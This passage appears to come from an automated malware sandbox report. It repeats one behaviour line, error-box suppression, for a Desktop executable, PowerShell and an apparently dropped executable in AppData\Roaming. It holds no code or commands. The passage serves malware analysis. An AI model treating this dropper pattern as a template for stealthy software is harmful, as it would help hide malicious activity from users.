                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
